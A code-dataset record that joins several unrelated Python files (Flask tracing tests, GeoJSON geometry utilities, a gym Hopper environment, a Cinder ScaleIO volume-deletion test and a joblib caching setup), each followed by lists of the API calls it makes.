self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented') # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundredone') self.assertEqual(handler_span.resource, '/501') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('501 Not Implemented')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented') # User exception span user_ex_span = spans[5] self.assertEqual(user_ex_span.service, 'flask') self.assertEqual(user_ex_span.name, 'flask.handle_user_exception') self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception') self.assertEqual(user_ex_span.error, 0) def test_request_error_handler(self): """ When making a request When the requested endpoint raises an exception We create the expected spans """ @self.app.errorhandler(500) def error_handler(e): return 'Whoops', 500 @self.app.route('/500') def fivehundred(): raise Exception('500 error') res = self.client.get('/500') self.assertEqual(res.status_code, 500) self.assertEqual(res.data, b'Whoops') spans = self.get_spans() if flask_version >= (0, 12, 0): self.assertEqual(len(spans), 11) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.fivehundred', 'flask.handle_user_exception', 'flask.handle_exception', 
'tests.contrib.flask.test_request.error_handler', 'flask.process_response', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) else: self.assertEqual(len(spans), 10) # Assert the order of the spans created self.assertListEqual( [ 'flask.request', 'flask.try_trigger_before_first_request_functions', 'flask.preprocess_request', 'flask.dispatch_request', 'tests.contrib.flask.test_request.fivehundred', 'flask.handle_user_exception', 'flask.handle_exception', 'tests.contrib.flask.test_request.error_handler', 'flask.do_teardown_request', 'flask.do_teardown_appcontext', ], [s.name for s in spans], ) # Assert span services for span in spans: self.assertEqual(span.service, 'flask') # Root request span req_span = spans[0] self.assertEqual(req_span.service, 'flask') self.assertEqual(req_span.name, 'flask.request') self.assertEqual(req_span.resource, 'GET /500') self.assertEqual(req_span.span_type, 'web') self.assertEqual(req_span.error, 1) self.assertIsNone(req_span.parent_id) # Request tags self.assertEqual(req_span.get_tag('http.method'), 'GET') self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500') assert_span_http_status_code(req_span, 500) self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred') self.assertEqual(req_span.get_tag('flask.url_rule'), '/500') # Dispatch span dispatch_span = spans[3] self.assertEqual(dispatch_span.service, 'flask') self.assertEqual(dispatch_span.name, 'flask.dispatch_request') self.assertEqual(dispatch_span.resource, 'flask.dispatch_request') self.assertEqual(dispatch_span.error, 1) self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name) # Handler span handler_span = spans[4] self.assertEqual(handler_span.service, 'flask') self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred') self.assertEqual(handler_span.resource, '/500') self.assertEqual(handler_span.error, 1) self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(handler_span.get_tag('error.type'), base_exception_name) # User exception span user_ex_span = spans[5] self.assertEqual(user_ex_span.service, 'flask') self.assertEqual(user_ex_span.name, 'flask.handle_user_exception') self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception') self.assertEqual(user_ex_span.error, 1) self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error')) self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback')) self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)
[ "flask.abort" ]
[((16267, 16277), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (16272, 16277), False, 'from flask import abort\n'), ((22922, 22932), 'flask.abort', 'abort', (['(501)'], {}), '(501)\n', (22927, 22932), False, 'from flask import abort\n')]
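The distributed-tracing test above only needs two request headers to join an existing trace. A minimal sketch outside the test harness, assuming ddtrace's documented patch(flask=True) entry point and the same header constants imported by the test module:

# A minimal sketch, not the ddtrace test harness; assumes the documented
# `patch(flask=True)` entry point and a stock Flask app.
from ddtrace import patch
patch(flask=True)  # instrument Flask before the app object is created

from flask import Flask
from ddtrace.propagation.http import HTTP_HEADER_PARENT_ID, HTTP_HEADER_TRACE_ID

app = Flask(__name__)


@app.route('/')
def index():
    return 'Hello Flask', 200


# Requests carrying these headers are attached to the upstream trace, which is
# what test_distributed_tracing asserts via span.trace_id / span.parent_id.
client = app.test_client()
client.get('/', headers={HTTP_HEADER_TRACE_ID: '678910',
                         HTTP_HEADER_PARENT_ID: '12345'})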
__doc__ = 'github: https://github.com/brandonxiang/geojson-python-utils' import math from coordTransform_utils import wgs84togcj02 from coordTransform_utils import gcj02tobd09 def linestrings_intersect(line1, line2): """ To valid whether linestrings from geojson are intersected with each other. reference: http://www.kevlindev.com/gui/math/intersection/Intersection.js Keyword arguments: line1 -- first line geojson object line2 -- second line geojson object if(line1 intersects with other) return intersect point array else empty array """ intersects = [] for i in range(0, len(line1['coordinates']) - 1): for j in range(0, len(line2['coordinates']) - 1): a1_x = line1['coordinates'][i][1] a1_y = line1['coordinates'][i][0] a2_x = line1['coordinates'][i + 1][1] a2_y = line1['coordinates'][i + 1][0] b1_x = line2['coordinates'][j][1] b1_y = line2['coordinates'][j][0] b2_x = line2['coordinates'][j + 1][1] b2_y = line2['coordinates'][j + 1][0] ua_t = (b2_x - b1_x) * (a1_y - b1_y) - \ (b2_y - b1_y) * (a1_x - b1_x) ub_t = (a2_x - a1_x) * (a1_y - b1_y) - \ (a2_y - a1_y) * (a1_x - b1_x) u_b = (b2_y - b1_y) * (a2_x - a1_x) - (b2_x - b1_x) * (a2_y - a1_y) if not u_b == 0: u_a = ua_t / u_b u_b = ub_t / u_b if 0 <= u_a and u_a <= 1 and 0 <= u_b and u_b <= 1: intersects.append({'type': 'Point', 'coordinates': [ a1_x + u_a * (a2_x - a1_x), a1_y + u_a * (a2_y - a1_y)]}) # if len(intersects) == 0: # intersects = False return intersects def _bbox_around_polycoords(coords): """ bounding box """ x_all = [] y_all = [] for first in coords[0]: x_all.append(first[1]) y_all.append(first[0]) return [min(x_all), min(y_all), max(x_all), max(y_all)] def _point_in_bbox(point, bounds): """ valid whether the point is inside the bounding box """ return not(point['coordinates'][1] < bounds[0] or point['coordinates'][1] > bounds[2] or point['coordinates'][0] < bounds[1] or point['coordinates'][0] > bounds[3]) def _pnpoly(x, y, coords): """ the algorithm to judge whether the point is located in polygon reference: https://www.ecse.rpi.edu/~wrf/Research/Short_Notes/pnpoly.html#Explanation """ vert = [[0, 0]] for coord in coords: for node in coord: vert.append(node) vert.append(coord[0]) vert.append([0, 0]) inside = False i = 0 j = len(vert) - 1 while i < len(vert): if ((vert[i][0] > y) != (vert[j][0] > y)) and (x < (vert[j][1] - vert[i][1]) * (y - vert[i][0]) / (vert[j][0] - vert[i][0]) + vert[i][1]): inside = not inside j = i i += 1 return inside def _point_in_polygon(point, coords): inside_box = False for coord in coords: if inside_box: break if _point_in_bbox(point, _bbox_around_polycoords(coord)): inside_box = True if not inside_box: return False inside_poly = False for coord in coords: if inside_poly: break if _pnpoly(point['coordinates'][1], point['coordinates'][0], coord): inside_poly = True return inside_poly def point_in_polygon(point, poly): """ valid whether the point is located in a polygon Keyword arguments: point -- point geojson object poly -- polygon geojson object if(point inside poly) return true else false """ coords = [poly['coordinates']] if poly[ 'type'] == 'Polygon' else poly['coordinates'] return _point_in_polygon(point, coords) def point_in_multipolygon(point, multipoly): """ valid whether the point is located in a mulitpolygon (donut polygon is not supported) Keyword arguments: point -- point geojson object multipoly -- multipolygon geojson object if(point inside multipoly) return true else false """ coords_array = [multipoly['coordinates']] if multipoly[ 'type'] == "MultiPolygon" else 
multipoly['coordinates'] for coords in coords_array: if _point_in_polygon(point, coords): return True return False def number2radius(number): """ convert degree into radius Keyword arguments: number -- degree return radius """ return number * math.pi / 180 def number2degree(number): """ convert radius into degree Keyword arguments: number -- radius return degree """ return number * 180 / math.pi def draw_circle(radius_in_meters, center_point, steps=15): """ get a circle shape polygon based on centerPoint and radius Keyword arguments: point1 -- point one geojson object point2 -- point two geojson object if(point inside multipoly) return true else false """ steps = steps if steps > 15 else 15 center = [center_point['coordinates'][1], center_point['coordinates'][0]] dist = (radius_in_meters / 1000) / 6371 # convert meters to radiant rad_center = [number2radius(center[0]), number2radius(center[1])] # 15 sided circle poly = [] for step in range(0, steps): brng = 2 * math.pi * step / steps lat = math.asin(math.sin(rad_center[0]) * math.cos(dist) + math.cos(rad_center[0]) * math.sin(dist) * math.cos(brng)) lng = rad_center[1] + math.atan2(math.sin(brng) * math.sin(dist) * math.cos(rad_center[0]), math.cos(dist) - math.sin(rad_center[0]) * math.sin(lat)) poly.append([number2degree(lng), number2degree(lat)]) return {"type": "Polygon", "coordinates": [poly]} def rectangle_centroid(rectangle): """ get the centroid of the rectangle Keyword arguments: rectangle -- polygon geojson object return centroid """ bbox = rectangle['coordinates'][0] xmin = bbox[0][0] ymin = bbox[0][1] xmax = bbox[2][0] ymax = bbox[2][1] xwidth = xmax - xmin ywidth = ymax - ymin return {'type': 'Point', 'coordinates': [xmin + xwidth / 2, ymin + ywidth / 2]} def point_distance(point1, point2): """ calculate the distance between two point on the sphere like google map reference http://www.movable-type.co.uk/scripts/latlong.html Keyword arguments: point1 -- point one geojson object point2 -- point two geojson object if(point inside multipoly) return true else false """ lon1 = point1['coordinates'][0] lat1 = point1['coordinates'][1] lon2 = point2['coordinates'][0] lat2 = point2['coordinates'][1] deg_lat = number2radius(lat2 - lat1) deg_lon = number2radius(lon2 - lon1) a = math.pow(math.sin(deg_lat / 2), 2) + math.cos(number2radius(lat1)) * \ math.cos(number2radius(lat2)) * math.pow(math.sin(deg_lon / 2), 2) c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a)) return (6371 * c) * 1000 def geometry_within_radius(geometry, center, radius): """ To valid whether point or linestring or polygon is inside a radius around a center Keyword arguments: geometry -- point/linstring/polygon geojson object center -- point geojson object radius -- radius if(geometry inside radius) return true else false """ if geometry['type'] == 'Point': return point_distance(geometry, center) <= radius elif geometry['type'] == 'LineString' or geometry['type'] == 'Polygon': point = {} # it's enough to check the exterior ring of the Polygon coordinates = geometry['coordinates'][0] if geometry['type'] == 'Polygon' else geometry['coordinates'] for coordinate in coordinates: point['coordinates'] = coordinate if point_distance(point, center) > radius: return False return True def area(poly): """ calculate the area of polygon Keyword arguments: poly -- polygon geojson object return polygon area """ poly_area = 0 # TODO: polygon holes at coordinates[1] points = poly['coordinates'][0] j = len(points) - 1 count = len(points) for i in range(0, count): p1_x = points[i][1] p1_y 
= points[i][0] p2_x = points[j][1] p2_y = points[j][0] poly_area += p1_x * p2_y poly_area -= p1_y * p2_x j = i poly_area /= 2 return poly_area def centroid(poly): """ get the centroid of polygon adapted from http://paulbourke.net/geometry/polyarea/javascript.txt Keyword arguments: poly -- polygon geojson object return polygon centroid """ f_total = 0 x_total = 0 y_total = 0 # TODO: polygon holes at coordinates[1] points = poly['coordinates'][0] j = len(points) - 1 count = len(points) for i in range(0, count): p1_x = points[i][1] p1_y = points[i][0] p2_x = points[j][1] p2_y = points[j][0] f_total = p1_x * p2_y - p2_x * p1_y x_total += (p1_x + p2_x) * f_total y_total += (p1_y + p2_y) * f_total j = i six_area = area(poly) * 6 return {'type': 'Point', 'coordinates': [y_total / six_area, x_total / six_area]} def destination_point(point, brng, dist): """ Calculate a destination Point base on a base point and a distance Keyword arguments: pt -- polygon geojson object brng -- an angle in degrees dist -- distance in Kilometer between destination and base point return destination point object """ dist = float(dist) / 6371 # convert dist to angular distance in radians brng = number2radius(brng) lon1 = number2radius(point['coordinates'][0]) lat1 = number2radius(point['coordinates'][1]) lat2 = math.asin(math.sin(lat1) * math.cos(dist) + math.cos(lat1) * math.sin(dist) * math.cos(brng)) lon2 = lon1 + math.atan2(math.sin(brng) * math.sin(dist) * math.cos(lat1), math.cos(dist) - math.sin(lat1) * math.sin(lat2)) lon2 = (lon2 + 3 * math.pi) % (2 * math.pi) - math.pi # normalise to -180 degree +180 degree return {'type': 'Point', 'coordinates': [number2degree(lon2), number2degree(lat2)]} def simplify(source, kink=20): """ source[] array of geojson points kink in metres, kinks above this depth kept kink depth is the height of the triangle abc where a-b and b-c are two consecutive line segments """ source_coord = map(lambda o: {"lng": o.coordinates[0], "lat": o.coordinates[1]}, source) # count, n_stack, n_dest, start, end, i, sig; # dev_sqr, max_dev_sqr, band_sqr; # x12, y12, d12, x13, y13, d13, x23, y23, d23; F = (math.pi / 180.0) * 0.5 index = [] # aray of indexes of source points to include in the reduced line sig_start = [] # indices of start & end of working section sig_end = [] # check for simple cases count = len(source_coord) if count < 3: return source_coord # one or two points # more complex case. initialize stack band_sqr = kink * 360.0 / (2.0 * math.pi * 6378137.0) # Now in degrees band_sqr *= band_sqr n_dest = 0 sig_start[0] = 0 sig_end[0] = count - 1 n_stack = 1 # while the stack is not empty while n_stack > 0: # ... pop the top-most entries off the stacks start = sig_start[n_stack - 1] end = sig_end[n_stack - 1] n_stack -= 1 if (end - start) > 1: #any intermediate points ? # ... 
yes, so find most deviant intermediate point to either side of line joining start & end points x12 = source[end]["lng"] - source[start]["lng"] y12 = source[end]["lat"] - source[start]["lat"] if math.fabs(x12) > 180.0: x12 = 360.0 - math.fabs(x12) x12 *= math.cos(F * (source[end]["lat"] + source[start]["lat"])) # use avg lat to reduce lng d12 = (x12 * x12) + (y12 * y12) i = start + 1 sig = start max_dev_sqr = -1.0 while i < end: x13 = source[i]["lng"] - source[start]["lng"] y13 = source[i]["lat"] - source[start]["lat"] if math.fabs(x13) > 180.0: x13 = 360.0 - math.fabs(x13) x13 *= math.cos(F * (source[i]["lat"] + source[start]["lat"])) d13 = (x13 * x13) + (y13 * y13) x23 = source[i]["lng"] - source[end]["lng"] y23 = source[i]["lat"] - source[end]["lat"] if math.fabs(x23) > 180.0: x23 = 360.0 - math.fabs(x23) x23 *= math.cos(F * (source[i]["lat"] + source[end]["lat"])) d23 = (x23 * x23) + (y23 * y23) if d13 >= (d12 + d23): dev_sqr = d23 elif d23 >= (d12 + d13): dev_sqr = d13 else: dev_sqr = (x13 * y12 - y13 * x12) * (x13 * y12 - y13 * x12) / d12 # solve triangle if dev_sqr > max_dev_sqr: sig = i max_dev_sqr = dev_sqr i += 1 if max_dev_sqr < band_sqr: # is there a sig. intermediate point ? #... no, so transfer current start point index[n_dest] = start n_dest += 1 else: # ... yes, so push two sub-sections on stack for further processing n_stack += 1 sig_start[n_stack - 1] = sig sig_end[n_stack - 1] = end n_stack += 1 sig_start[n_stack - 1] = start sig_end[n_stack - 1] = sig else: # ... no intermediate points, so transfer current start point index[n_dest] = start n_dest += 1 # transfer last point index[n_dest] = count - 1 n_dest += 1 # make return array r = [] for i in range(0, n_dest): r.append(source_coord[index[i]]) return map(lambda o: {"type": "Point","coordinates": [o.lng, o.lat]}, r) def wgs2gcj(geometry): """ convert wgs84 to gcj referencing by https://github.com/wandergis/coordTransform_py """ # TODO: point linestring point if geometry['type'] == 'MultiLineString': coordinates = geometry['coordinates'] for lines in coordinates: for line in lines: line[0], line[1] = wgs84togcj02(line[0], line[1]) return geometry def gcj2bd(geometry): """ convert gcj to bd referencing by https://github.com/wandergis/coordTransform_py """ # TODO: point linestring point if geometry['type'] == 'MultiLineString': coordinates = geometry['coordinates'] for lines in coordinates: for line in lines: line[0], line[1] = gcj02tobd09(line[0], line[1]) return geometry
[ "coordTransform_utils.gcj02tobd09", "math.sqrt", "coordTransform_utils.wgs84togcj02", "math.cos", "math.fabs", "math.sin" ]
[((7021, 7042), 'math.sin', 'math.sin', (['(deg_lat / 2)'], {}), '(deg_lat / 2)\n', (7029, 7042), False, 'import math\n'), ((7181, 7193), 'math.sqrt', 'math.sqrt', (['a'], {}), '(a)\n', (7190, 7193), False, 'import math\n'), ((7195, 7211), 'math.sqrt', 'math.sqrt', (['(1 - a)'], {}), '(1 - a)\n', (7204, 7211), False, 'import math\n'), ((12146, 12203), 'math.cos', 'math.cos', (["(F * (source[end]['lat'] + source[start]['lat']))"], {}), "(F * (source[end]['lat'] + source[start]['lat']))\n", (12154, 12203), False, 'import math\n'), ((7132, 7153), 'math.sin', 'math.sin', (['(deg_lon / 2)'], {}), '(deg_lon / 2)\n', (7140, 7153), False, 'import math\n'), ((10081, 10095), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10089, 10095), False, 'import math\n'), ((10098, 10112), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10106, 10112), False, 'import math\n'), ((10170, 10184), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (10178, 10184), False, 'import math\n'), ((10278, 10292), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10286, 10292), False, 'import math\n'), ((10294, 10308), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10302, 10308), False, 'import math\n'), ((12058, 12072), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12067, 12072), False, 'import math\n'), ((12624, 12679), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[start]['lat']))"], {}), "(F * (source[i]['lat'] + source[start]['lat']))\n", (12632, 12679), False, 'import math\n'), ((12963, 13016), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[end]['lat']))"], {}), "(F * (source[i]['lat'] + source[end]['lat']))\n", (12971, 13016), False, 'import math\n'), ((14749, 14779), 'coordTransform_utils.wgs84togcj02', 'wgs84togcj02', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (14761, 14779), False, 'from coordTransform_utils import wgs84togcj02\n'), ((15155, 15184), 'coordTransform_utils.gcj02tobd09', 'gcj02tobd09', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\n', (15166, 15184), False, 'from coordTransform_utils import gcj02tobd09\n'), ((5546, 5569), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5554, 5569), False, 'import math\n'), ((5572, 5586), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5580, 5586), False, 'import math\n'), ((5656, 5670), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (5664, 5670), False, 'import math\n'), ((5788, 5811), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5796, 5811), False, 'import math\n'), ((5813, 5827), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (5821, 5827), False, 'import math\n'), ((10136, 10150), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10144, 10150), False, 'import math\n'), ((10153, 10167), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10161, 10167), False, 'import math\n'), ((10215, 10229), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (10223, 10229), False, 'import math\n'), ((10232, 10246), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (10240, 10246), False, 'import math\n'), ((10311, 10325), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10319, 10325), False, 'import math\n'), ((10328, 10342), 'math.sin', 'math.sin', (['lat2'], {}), '(lat2)\n', (10336, 10342), False, 'import math\n'), ((12112, 12126), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12121, 12126), False, 'import math\n'), ((12528, 12542), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12537, 12542), False, 'import math\n'), ((12867, 
12881), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12876, 12881), False, 'import math\n'), ((5613, 5636), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\n', (5621, 5636), False, 'import math\n'), ((5639, 5653), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5647, 5653), False, 'import math\n'), ((5713, 5727), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (5721, 5727), False, 'import math\n'), ((5730, 5744), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\n', (5738, 5744), False, 'import math\n'), ((5830, 5853), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\n', (5838, 5853), False, 'import math\n'), ((5856, 5869), 'math.sin', 'math.sin', (['lat'], {}), '(lat)\n', (5864, 5869), False, 'import math\n'), ((12586, 12600), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\n', (12595, 12600), False, 'import math\n'), ((12925, 12939), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\n', (12934, 12939), False, 'import math\n')]
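The geojson utilities above operate on plain GeoJSON dicts with [lng, lat] coordinate order. A hedged usage sketch, assuming the file is importable as geojson_utils (the module name used in the upstream repository):

# Usage sketch for the utilities above; the import name is an assumption.
from geojson_utils import draw_circle, point_distance, point_in_polygon

# One degree of latitude is roughly 111 km on the sphere used by point_distance.
start = {'type': 'Point', 'coordinates': [0, 0]}
end = {'type': 'Point', 'coordinates': [0, 1]}
print(point_distance(start, end))  # roughly 111 km, returned in metres

# A 2x2 degree square; the probe point sits inside it.
square = {'type': 'Polygon',
          'coordinates': [[[0, 0], [2, 0], [2, 2], [0, 2], [0, 0]]]}
print(point_in_polygon({'type': 'Point', 'coordinates': [1, 1]}, square))  # True

# An 18-step polygon approximating a 500 m circle around `start`.
print(draw_circle(500, start, steps=18))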
import gym.envs.mujoco.hopper as hopper
import numpy as np


class HopperEnv(hopper.HopperEnv):
    def _get_obs(self):
        return np.concatenate([
            self.sim.data.qpos.flat[1:],
            self.sim.data.qvel.flat,
        ])

    def reset_obs(self, obs):
        state = np.insert(obs, 0, 0.)
        qpos = state[:self.model.nq]
        qvel = state[self.model.nq:]
        self.set_state(qpos, qvel)
        return self._get_obs()
[ "numpy.insert", "numpy.concatenate" ]
[((135, 205), 'numpy.concatenate', 'np.concatenate', (['[self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat]'], {}), '([self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat])\n', (149, 205), True, 'import numpy as np\n'), ((288, 310), 'numpy.insert', 'np.insert', (['obs', '(0)', '(0.0)'], {}), '(obs, 0, 0.0)\n', (297, 310), True, 'import numpy as np\n')]
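The HopperEnv subclass above returns observations that drop qpos[0], and reset_obs pads a zero back in before splitting the state into qpos and qvel. A numpy-only sketch of that round trip (no MuJoCo needed; nq = nv = 6 is an assumption matching the standard Hopper model):

import numpy as np

nq, nv = 6, 6                            # assumed sizes of qpos and qvel
obs = np.arange(nq - 1 + nv, dtype=float)     # the observation omits qpos[0]

state = np.insert(obs, 0, 0.)                 # restore a zero for qpos[0]
qpos, qvel = state[:nq], state[nq:]
assert qpos.shape == (nq,) and qvel.shape == (nv,)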
# Copyright (c) 2013 - 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from six.moves import urllib

from cinder import context
from cinder import exception
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_volume
from cinder.tests.unit.volume.drivers.emc import scaleio
from cinder.tests.unit.volume.drivers.emc.scaleio import mocks


class TestDeleteVolume(scaleio.TestScaleIODriver):
    """Test cases for ``ScaleIODriver.delete_volume()``"""

    def setUp(self):
        """Setup a test case environment.

        Creates a fake volume object and sets up the required API responses.
        """
        super(TestDeleteVolume, self).setUp()
        ctx = context.RequestContext('fake', 'fake', auth_token=True)

        self.volume = fake_volume.fake_volume_obj(
            ctx, **{'provider_id': fake.PROVIDER_ID})

        self.volume_name_2x_enc = urllib.parse.quote(
            urllib.parse.quote(self.driver._id_to_base64(self.volume.id))
        )

        self.HTTPS_MOCK_RESPONSES = {
            self.RESPONSE_MODE.Valid: {
                'types/Volume/instances/getByName::' +
                self.volume_name_2x_enc: self.volume.id,
                'instances/Volume::{}/action/removeMappedSdc'.format(
                    self.volume.provider_id): self.volume.provider_id,
                'instances/Volume::{}/action/removeVolume'.format(
                    self.volume.provider_id
                ): self.volume.provider_id,
            },
            self.RESPONSE_MODE.BadStatus: {
                'types/Volume/instances/getByName::' +
                self.volume_name_2x_enc: mocks.MockHTTPSResponse(
                    {
                        'errorCode': 401,
                        'message': 'BadStatus Volume Test',
                    }, 401
                ),
                'instances/Volume::{}/action/removeVolume'.format(
                    self.volume.provider_id
                ): mocks.MockHTTPSResponse(
                    {
                        'errorCode': 401,
                        'message': 'BadStatus Volume Test',
                    }, 401
                ),
            },
        }

    def test_bad_login_and_volume(self):
        self.set_https_response_mode(self.RESPONSE_MODE.BadStatus)
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.driver.delete_volume,
                          self.volume)

    def test_delete_volume(self):
        """Setting the unmap volume before delete flag for tests"""
        self.driver.configuration.set_override(
            'sio_unmap_volume_before_deletion', override=True)

        self.driver.delete_volume(self.volume)
[ "cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse", "cinder.tests.unit.fake_volume.fake_volume_obj", "cinder.context.RequestContext" ]
[((1268, 1323), 'cinder.context.RequestContext', 'context.RequestContext', (['"""fake"""', '"""fake"""'], {'auth_token': '(True)'}), "('fake', 'fake', auth_token=True)\n", (1290, 1323), False, 'from cinder import context\n'), ((1347, 1416), 'cinder.tests.unit.fake_volume.fake_volume_obj', 'fake_volume.fake_volume_obj', (['ctx'], {}), "(ctx, **{'provider_id': fake.PROVIDER_ID})\n", (1374, 1416), False, 'from cinder.tests.unit import fake_volume\n'), ((2211, 2299), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2234, 2299), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n'), ((2536, 2624), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', (["{'errorCode': 401, 'message': 'BadStatus Volume Test'}", '(401)'], {}), "({'errorCode': 401, 'message':\n 'BadStatus Volume Test'}, 401)\n", (2559, 2624), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n')]
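The setUp above keys its mocked REST responses on a double URL-quoted volume name; the quoting itself is plain stdlib. A sketch of that 2x encoding with the base64 step stubbed out, since _id_to_base64 is not shown here:

from six.moves import urllib

# Sketch of the volume_name_2x_enc construction above. The real driver first
# base64-encodes the volume id via _id_to_base64 (not shown); a hypothetical
# literal stands in for that result.
encoded_id = 'ZmFrZS1pZA=='
name_2x_enc = urllib.parse.quote(urllib.parse.quote(encoded_id))
print(name_2x_enc)  # '=' becomes %3D on the first pass and %253D on the second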
# -*- coding: utf-8 -*-

__version__ = '1.0.2'

import os

import appdirs
import osmnx as ox
import joblib
import requests

from .files import load_vars, save_vars, cached, inflate_tar, download_zipfile
from .data import data, list_data, problematic
from .tools.view_code import show_file
from . import mapping

cache_dir = None
memory = None


def set_cache_dir(location=None, compress=True, verbose=0, **kwargs):
    """
    Set up a cache directory for use with the tutorials.

    Parameters
    ----------
    location : Path-like or False, optional
        A path for the cache files.  Set to False to disable caching.
    """
    global memory, cache_dir
    if location is None:
        location = appdirs.user_cache_dir('transportation_tutorials')
    if location is False:
        location = None
    memory = joblib.Memory(location, compress=compress, verbose=verbose, **kwargs)
    make_cache = (
        (ox, 'gdf_from_place'),
        (ox, 'graph_from_bbox'),
        (requests, 'get'),
        (requests, 'post'),
    )
    for module, func_name in make_cache:
        try:
            func = getattr(module, f"_{func_name}_orig")
        except AttributeError:
            func = getattr(module, func_name)
        setattr(module, f"_{func_name}_orig", func)
        setattr(module, func_name, memory.cache(func))


set_cache_dir()
[ "joblib.Memory", "appdirs.user_cache_dir" ]
[((772, 841), 'joblib.Memory', 'joblib.Memory', (['location'], {'compress': 'compress', 'verbose': 'verbose'}), '(location, compress=compress, verbose=verbose, **kwargs)\n', (785, 841), False, 'import joblib\n'), ((668, 718), 'appdirs.user_cache_dir', 'appdirs.user_cache_dir', (['"""transportation_tutorials"""'], {}), "('transportation_tutorials')\n", (690, 718), False, 'import appdirs\n')]
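set_cache_dir above wraps selected osmnx and requests functions with joblib.Memory so repeated downloads are served from disk; the same pattern works on any function. A standalone sketch of that memoization (the cache directory name here is an arbitrary assumption):

import joblib

# Standalone sketch of the joblib.Memory pattern used by set_cache_dir above.
memory = joblib.Memory('./cache-demo', verbose=0)


def slow_square(x):
    print('computing...')
    return x * x


cached_square = memory.cache(slow_square)
cached_square(4)   # computes, prints 'computing...', and stores the result
cached_square(4)   # second call is served from the on-disk cache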
